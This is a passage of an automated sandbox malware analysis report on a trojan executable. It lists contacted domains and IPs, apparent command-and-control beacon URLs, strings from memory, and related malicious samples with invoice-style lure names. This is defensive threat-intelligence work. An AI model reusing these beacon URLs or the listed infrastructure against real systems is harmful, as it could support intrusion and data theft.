            http://www.jiyu-kobo.co.jp/nt0%Avira URL Cloudsafe
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp//lpk0%Avira URL Cloudsafe
            http://www.tiro.coma-e0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0ro0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/D0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.urwpp.deMT0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.shacksolid.com/ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/denQ0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/y0%URL Reputationsafe
            http://www.fontbureau.comk0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/ms0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/v0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
            http://www.fontbureau.comt0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/k0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/nly0%Avira URL Cloudsafe
            http://www.fontbureau.comFk0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fbc7888164e64afca05b80bb89630439.pacloudflare.com
            		172.65.227.72
            		truetrue
              		unknown
              www.rjtherealest.com
              		74.208.236.145
              		truefalse
                		unknown
                www.shacksolid.com
                		64.190.62.111
                		truetrue
                  		unknown
                  fis.photos
                  		192.0.78.24
                  		truetrue
                    		unknown
                    www.apricitee.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.fis.photos
                      		unknown
                      		unknowntrue
                        		unknown
                        www.instatechnovelz.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.brondairy.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            www.fis.photos/ef6c/true
                            • Avira URL Cloud: safe
                            		low
                            http://www.apricitee.com/ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaCtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.shacksolid.com/ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80Dtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://flow.page/rjdarealest/ef6c/?BJB=7nO80D&yrTlglv8=yyRuLH34INETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designersGFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.galapagosdesign.com/staff/dennis.htmNormaldkFu94e0b1TR.exe, 00000000.00000003.264185208.000000000597A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comI.TTFFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/?Fu94e0b1TR.exe, 00000000.00000003.257106060.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.comditoFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designersKFu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comalicuFu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/bTheFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp/DFu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.tiro.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comessedFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.goodfont.co.krFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersivaFu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersPFu94e0b1TR.exe, 00000000.00000003.258524788.0000000005999000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.collada.org/2005/11/COLLADASchema9DoneFu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cTheFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/7Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/chFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://fontfabrik.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/)Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/(Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fonts.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com7Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.urwpp.deFu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comDFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comR.TTFFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comtutaFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSFu94e0b1TR.exe, 00000000.00000003.263989086.0000000005999000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/kFu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/%Fu94e0b1TR.exe, 00000000.00000003.257245826.000000000599C000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0Fu94e0b1TR.exe, 00000000.00000003.252645289.00000000059A1000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comFu94e0b1TR.exe, 00000000.00000002.285145562.0000000005964000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.galapagosdesign.com/Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/ntFu94e0b1TR.exe, 00000000.00000003.253958296.0000000005968000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.comFFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlrFu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp//lpkFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tiro.coma-eFu94e0b1TR.exe, 00000000.00000003.252359089.0000000005999000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/Y0roFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/DFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/jp/Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.comdFu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmpfalse
                                                      		unknown
                                                      http://www.urwpp.deMTFu94e0b1TR.exe, 00000000.00000003.261217392.000000000596E000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carterandcone.comlFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn/Fu94e0b1TR.exe, 00000000.00000003.252293628.0000000005999000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/denQFu94e0b1TR.exe, 00000000.00000003.264392875.000000000599E000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/yFu94e0b1TR.exe, 00000000.00000003.253827230.000000000596D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNFu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.comkFu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cnFu94e0b1TR.exe, 00000000.00000003.252060604.000000000599A000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.jiyu-kobo.co.jp/msFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/vFu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/tFu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlFu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.comtFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/Fu94e0b1TR.exe, 00000000.00000003.254233996.0000000005963000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/kFu94e0b1TR.exe, 00000000.00000003.254492265.000000000596C000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8Fu94e0b1TR.exe, 00000000.00000003.259630894.0000000005999000.00000004.00000001.sdmp, Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.fontbureau.com/designers/frere-jones.htmlxFu94e0b1TR.exe, 00000000.00000003.259327134.0000000005999000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/nlyFu94e0b1TR.exe, 00000000.00000003.253358837.0000000005963000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers5Fu94e0b1TR.exe, 00000000.00000003.259563222.0000000005999000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.comFkFu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_landNETSTAT.EXE, 00000012.00000002.518424149.00000000033D2000.00000004.00020000.sdmpfalse
                                                                    		high

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    64.190.62.111
                                                                    		www.shacksolid.comUnited States
                                                                    		11696NBS11696UStrue
                                                                    172.65.227.72
                                                                    		fbc7888164e64afca05b80bb89630439.pacloudflare.comUnited States
                                                                    		13335CLOUDFLARENETUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                    Analysis ID:502374
                                                                    Start date:13.10.2021
                                                                    Start time:20:56:10
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 12m 52s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Sample file name:Fu94e0b1TR (renamed file extension from none to exe)
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:27
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@9/1@6/2
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 8% (good quality ratio 7%)
                                                                    • Quality average: 72.9%
                                                                    • Quality standard deviation: 33%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 78
                                                                    • Number of non-executed functions: 146
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 95.100.218.79, 95.100.216.89, 204.79.197.200, 13.107.21.200, 20.50.102.62, 8.247.248.223, 8.247.248.249, 8.247.244.221, 40.112.88.60, 2.20.178.24, 2.20.178.33, 20.82.210.154
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, dual-a-0001.a-msedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502374/sample/Fu94e0b1TR.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    20:57:21API Interceptor1x Sleep call for process: Fu94e0b1TR.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    64.190.62.111divpCHa0h7.exeGet hashmaliciousBrowse
                                                                    • www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS
                                                                    wDzceoRPhB.exeGet hashmaliciousBrowse
                                                                    • www.artoidmode.com/ed9s/?2d64u=GZS0ntMXED7DC&j6A=OS1OG2uUyb/VuVpwb7VagzR+sXqT97Ebu6qajULP6tWiYdo/lZowWla7DoFCis6BwYQ7
                                                                    wO4j83Z0nB.exeGet hashmaliciousBrowse
                                                                    • www.eaglelures.com/shjn/?4huPeB=fLPs2Pf5YsyIrReC5+nyeXhjuGvcKd4ZNbc7bYo7WcEYvq7qfTlOwt6z9eiotXX8oFy5NaIH5g==&8pll=h2M80lLH_NRh4lTP
                                                                    RNIpSzBRVC.exeGet hashmaliciousBrowse
                                                                    • www.shacksolid.com/ef6c/?l6phLTh=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/Gtb7NPDI39K9qB3Q==&UL=5j0Ll4TXePsH7TFp
                                                                    DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                                    • www.eaglelures.com/shjn/?lL=fLPs2Pf8YryMrBSO7+nyeXhjuGvcKd4ZNbErHb06S8EZvbXsYD0CmpCx+4iXqHv3qlafUg==&NRX4i6=BxoHnNf8mX1
                                                                    Swift Copy.exeGet hashmaliciousBrowse
                                                                    • www.margotandmontague.com/eods/?i8kt=rS6FBqWeadRIrUjRXVGDKJCXOrHmePLNijFl/Z5Z+nBb3zS+3MyVFNG7lwq4S2nmAYRT&1bRLa=YfFxl
                                                                    p83BktbXwe.exeGet hashmaliciousBrowse
                                                                    • www.shacksolid.com/ef6c/?TN6=m6pTon&YFQLD6=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/GUEKtMNer6K9qGkg==
                                                                    HUuKj0kt3z.exeGet hashmaliciousBrowse
                                                                    • www.shacksolid.com/ef6c/?p4R4=PhjHKdH0&M0=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ8q9HKR0E9es
                                                                    ibelNHDA0l.exeGet hashmaliciousBrowse
                                                                    • www.shacksolid.com/ef6c/?-ZUt=d0G0Yn1hWXrx&6liX3=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r
                                                                    SOA.exeGet hashmaliciousBrowse
                                                                    • www.margotandmontague.com/eods/?t2J=i48Hk&0488qv=rS6FBqWeadRIrUjRXVGDKJCXOrHmePLNijFl/Z5Z+nBb3zS+3MyVFNG7lwq4S2nmAYRT
                                                                    JFE6tQehuD.exeGet hashmaliciousBrowse
                                                                    • www.metaju.com/hp6s/?3fi4-=oTVRl9Ml+OPXCj4hXV9OE5wFzXP9r5xGefeVUpAp//OvItILtz2iowizXiJv4RVplgLV&nHe8qD=uT4P8xNpn2xLT
                                                                    qFghuPTDuw.exeGet hashmaliciousBrowse
                                                                    • www.espressence.com/heth/?ZL3DB4=k0ADkxu0U9bB5vfcGnx5Bs1sio5yDITUm4QVk28VSMP15iSTcA+z80qdnmNkqg687zJ8t5HzaA==&j48D=mDHPtfePwBFdPz
                                                                    DUE PAYMENT.exeGet hashmaliciousBrowse
                                                                    • www.arroundworld.com/b2c0/?2dpPwJP=HgvD120OCtIy2y4XcSYLXMqfh1iHIXLo+sJztNYgJy1E5kFWd+L461vXk/S7HsBG78Yt&uN9=3fPH4rk8fd4xHD
                                                                    DUE INVOICES.exeGet hashmaliciousBrowse
                                                                    • www.cleanerstoday.com/b6cu/?BT=2dhhnfvPB6f8zBxp&R2MD6=s6p0OZd7QyF8NlKcRKg3d1Mhcu09NMFJH4/6pKf9s+pgPcRhCY/sfApJlg4NsLKExf7o
                                                                    04_extracted.exeGet hashmaliciousBrowse
                                                                    • www.floving.com/n64d/?Cp=DP82qm31la64DOOKpdUd06m34NWm8oWBFGOqGRtoZCrcCLyfaO//8P4OrMWD8005mMFK&z8t=Xnpl7Zy8MJQL
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • www.delights.info/k8b5/?wHzl=n58VdqdNqp0SKyCVZWhsMzftZSLJsGdR5bs0KFZ5CUW42r4DzaRBfIPAFoSHs1TqGO6s&-ZC=m6APvNqxt
                                                                    Statement of Account.exeGet hashmaliciousBrowse
                                                                    • www.cleanerstoday.com/b6cu/?1bxdQ0YH=s6p0OZd7QyF8NlKcRKg3d1Mhcu09NMFJH4/6pKf9s+pgPcRhCY/sfApJljYdjqa8v6Sv&m0DD=bT0pMNUhtf28
                                                                    USD INV#1191189.exeGet hashmaliciousBrowse
                                                                    • www.cleanerstoday.com/b6cu/?R2Mx=s6p0OZd7QyF8NlKcRKg3d1Mhcu09NMFJH4/6pKf9s+pgPcRhCY/sfApJljY38aq8r4av&gJBp9R=4hx40FuPFpNXarZP
                                                                    NEW_PO_QUOTE_88987_PDF.exeGet hashmaliciousBrowse
                                                                    • www.itbling.com/snaa/?Rv=HoB7UN9NeUtFFxU706ZiB/yN8phSIrDDzxMV/Ji+4+dNDKz34ah20hb+VYbC7wDWP/ld&p2J=vZw8NdKxk8f
                                                                    Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                    • www.nge.xyz/mo8t/?zxlpi=o1c4mJ3VAZ0Opt29tYk9ZJ1L/8ohiIP72w8Hsb8darVa0q91TqSigaAH0fmvs0SBq4qZcQ==&LR=w4UxT2yx30FHEXz

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    fbc7888164e64afca05b80bb89630439.pacloudflare.comRNIpSzBRVC.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    1taaCpMNKr.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    qZfsUMa6Jh.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    HUuKj0kt3z.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    pdrAizaO1R.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    $$$.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    sample catalog_2021.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    Transfer application.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    CTM ARRANGEMENT.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    Proforma Invoice & Bank Swift Copy.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    USU(1).exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    PO#EIMG_501_367_089.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    Request for Quotation RFQ GC-0016862.PDF.exeGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    hEtfBNCsR8.rtfGet hashmaliciousBrowse
                                                                    • 172.65.227.72
                                                                    www.shacksolid.comRNIpSzBRVC.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    p83BktbXwe.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    HUuKj0kt3z.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    ibelNHDA0l.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    www.rjtherealest.com0n1pEFuGKC.exeGet hashmaliciousBrowse
                                                                    • 74.208.236.145
                                                                    4ZfdpLEQn1.exeGet hashmaliciousBrowse
                                                                    • 74.208.236.145

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    NBS11696USdivpCHa0h7.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    wDzceoRPhB.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    wO4j83Z0nB.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    RNIpSzBRVC.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    Swift Copy.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    p83BktbXwe.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    HUuKj0kt3z.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    ibelNHDA0l.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    SOA.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    JFE6tQehuD.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    qFghuPTDuw.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
